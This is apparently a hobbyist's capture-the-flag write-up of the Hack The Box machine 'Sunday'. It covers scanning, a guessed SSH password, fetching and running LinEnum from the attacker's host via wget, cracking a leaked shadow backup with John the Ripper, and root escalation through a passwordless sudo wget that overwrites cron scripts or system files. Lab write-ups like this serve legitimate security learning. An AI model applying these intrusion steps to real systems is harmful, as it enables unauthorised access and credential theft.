Completed April 2018
I recommend taking a slow approach to scanning on this one. After doing several regular speed scans, I just felt like I was missing something important, so I re-ran my NMAP scan with nmap -vvv -T2 -p- 10.10.10.76. This was more revealing then I could individually scan known open ports for more detail. The first time I ran a standard full-port nmap, I didn’t get the last two ports (for smserverd).
Additionally, NMAP suggests the following for OS:
Aggressive OS guesses: Sun OpenSolaris 2008.11 (94%), Sun Solaris 10 (94%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (94%), Sun Solaris 9 or 10 (SPARC) (92%), Sun Storage 7210 NAS device (92%), Sun Solaris 9 or 10 (92%), Oracle Solaris 11 (91%), Sun Solaris 8 (90%), Sun Solaris 9 (89%), Sun Solaris 8 (SPARC) (89%)
I attempted a few known vulnurabilities to enumerate what’s running on the machine via 111 (sometimes you can see file shares this way), but was unable to return anything. I started looking at what I knew, and then just honestly took a shot in the dark. This rarely works, but I was able to ssh email@example.com -p 22022 using the password sunday of all freaking things… It was honestly just a shot in the dark, and a convenient reminder that sometimes you don’t have to go nuts to figure out a password.
So, the unfortunate thing here is that when I run a find / -name user.txt, I see that the user flag is in sammy’s home folder, not sunnys. So, I need to find a way to pivot my access and to do that I’m going to do some further enumeration on the box.
One of the first things I ever do is run sudo -l to see what I may be able to have elevated privs for.
So, if I try to sudo, I get this:
sunny@sunday:/$ sudo -u root /root/troll
I enumerate further but going ahead and uploading LinEnum. I start an HTTP server on my local box, and identify that wget is installed on the victim box, so I wget http://10.10.14.4:8080/LinEnum.sh, do a chmod 777 LinEnum.sh to make it executable, and then run it with ./LinEnum.sh.
SunOS sunday 5.11 snv_111b i86pc i386 i86pc Solaris
Sammy is a member of the staff group, sunny is a member of the ‘other’ group.
At this point, my standard tools and first look haven’t shown me much of what I could find useful. I start some manual enumeration beginning in /. I am actually ashamed to admit that this step hung me up for literally 2 or 3 days because I didn’t see the very first listing in the directory and explore it. I went down VNC rabbit holes, was hunting for kernel level exploits, kept trying to figure out how the hell I was going to escalate this without getting the hash for sammy or something. After those two or three days, wouldn’t you know it’s as a simple as heading to /backup where we find a shadow.backup file. Oy. I felt super dumb.
I copied over the file to a .txt and ran it through john. We know because of $5 that this is a sha256crypt format, so I went ahead and forced the format to save a little time. I used my rockyou.txt wordlist, and enforced rules from john.conf which relate to how mangling is handled (mangling rules = how they substitute !s and character case, and everything else). This tutorial was most helpful for me in this process: https://pentestlab.blog/2012/07/23/dumping-and-cracking-unix-password-hashes/
JohntheRipper cracked the hash as “cooldude!”
I just ssh in as sammy, cat user.txt: a3d9498027ca5187ba1793943ee8a598
Now, as we move to root:
Sudo -l is almost always the first command I run – I can sudo w/o a passwd on wget. This is handy. I’m pretty sure I can set up a SimpleHTTPServer on my attack box, and send a script to whatever directory that can either cat root, or throw me a shell as root. The problem here is that sudo is only good for wget, not the chmod or execution, or piping to other things. So, I can only overwrite what’s already there. That’s good to know at least, but which vector is the easiest one to overwrite to root.
I did a lot of reading about ways to maybe execute scripts with wget, and it appears sometimes its possible, but I think with our ultra limited permissions and not being able to call anything else, these kept failing.
The last thing I tried on this particular path of “execute as it uploads” was this, was hopeful, but cannot concatenate onto things as root, only can wget.
OK, let’s go back to the drawing board and see what other things that we can overwrite (because keep in mind wget -O overwrites the output files). I’ve had multiple successes in these HTB machines leveraging cronjobs before. Let’s check out what cronjobs are running as root (cronjob -l root)
Sweet, there’s a update-refresh.sh that runs every handful of hours. That’s a mild annoyance as I may be sitting around waiting for ages for a shell (or in HTB land someone may reset my box while I’m waiting). In that case I just need to see if I can overwrite crontab with one that will run my script of choice every minute or so. There’s a few ways I thought of to accomplish this (create new line in crontab for shell.sh, replace update-refresh.sh with my own script and let the crontab take care of it with or without adjusting timing)
I’m just going to create a new script under the same name on my attack machine, then wget it as root to overwrite the one that’s there since I don’t think I can append it and have permissions work out, so then I’ll just replace the file that exists and have the automated cron job throw me the shell. Oy. I’m tired of this box. Unfortunately, this thing only runs like every few hours, so I could be waiting around for ages to catch the shell unless I time it right.
Also, crontab -e root opens in vi (uggggghhhh). So, I can edit it it seems, but I could just wait and edit /wget only the shell. How the hell do I generate a crontab out of the box and wget that to overwrite the existing crontab?
I messed around with this for a few days, but never quite got it working, and I’m realizing there may be more than one way to skin this particular cat. So, all I have is wget, right, which means I can GET, PUT or POST with HTTP. Can any of those be worth my time. I looked at FTP with wget as well, but again, execution. There has to be some way to trigger execution with a download or other HTTP request that I just haven’t found yet. I still think the crontab method is entirely valid, but it was outside this particular n00b’s level of skill and I was ready to just be done with this box entirely. Now that I think about it, there are probably a number of ways to root this box; overwriting the cronjob .sh file, overwriting sudoers/shadow files, to name a few. It depends on how much havok you want to cause on the machine. I’m trying to build a habit of good OPSEC in my pentests, and I chose the next method because of how much less obvious it is than overwriting something vital like sudoers.
So, the crontab, etc/passwd, etcetera stuff is really the “right” way to get a shell… but wouldn’t you know there’s a switch in wget that can read local files. I still don’t consider a box rooted unless I can actually catch a shell or get code execution, but this was a nifty little flag I hadn’t ever used before (and honestly don’t think I will ever have cause to use again, but there you go).